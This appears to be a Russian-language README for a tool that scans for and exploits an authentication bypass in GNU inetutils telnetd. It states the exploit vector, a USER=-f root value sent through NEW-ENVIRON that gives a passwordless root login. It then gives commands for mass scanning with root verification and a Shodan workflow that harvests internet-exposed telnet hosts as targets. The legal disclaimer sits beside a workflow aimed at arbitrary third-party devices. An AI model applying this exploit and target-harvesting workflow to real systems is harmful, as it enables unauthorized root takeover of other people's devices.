
Сканирует на наличие CVE-2026-24061 — обхода аутентификации в telnetd, генерирует полезные нагрузки и проверяет получение root-доступа на уязвимых устройствах с GNU inetutils telnetd.
⚠️ ОЧЕНЬ ВАЖНОЕ ЮРИДИЧЕСКОЕ ПРЕДУПРЕЖДЕНИЕ ⚠️
Этот инструмент предназначен исключительно для образовательных целей, исследований в области безопасности, анализа уязвимостей и авторизованного тестирования.
USER=-f root (или вариаций) через опцию NEW-ENVIRON позволяет немедленный вход как root без пароля.Этот сканер стал возможен благодаря отличному техническому анализу и доказательству концепции, опубликованным командой Hakai Security.
Их подробная статья предоставила точные технические основы по вектору эксплуатации, реальным полезным нагрузкам и поведению уязвимого telnetd.
→ Читайте полный анализ здесь:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Большое спасибо Hakai Security за прозрачность, техническое качество и вклад в сообщество безопасности. Вы помогли сделать этот инструмент более точным и полезным для ответственных исследований.
--users (по умолчанию включает root, admin, pi, ubuntu, debian и т.д.)id и whoami (--verify)-w)# Рекомендуется: используйте virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Установите зависимости
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Со списком целей (например, Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Сфокусировано на root (быстрее)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (только список IP)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Инициализируйте с вашим API-ключом
shodan init SUA_API_KEY_AQUI
# Загрузите возможные цели
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Извлеките IP
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Сканирование
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Pull request'ы приветствуются, при условии сохранения этической направленности и усиления предупреждений об ответственности. Лицензия MIT License – но подчёркиваю: несанкционированное использование является исключительной ответственностью пользователя. Создано для изучения, повышения осведомлённости и исследований в области безопасности.
⭐ Если было полезно, поставьте звезду!
🛡️ Используйте с крайней осторожностью.
Сделано с ❤️ by killsystema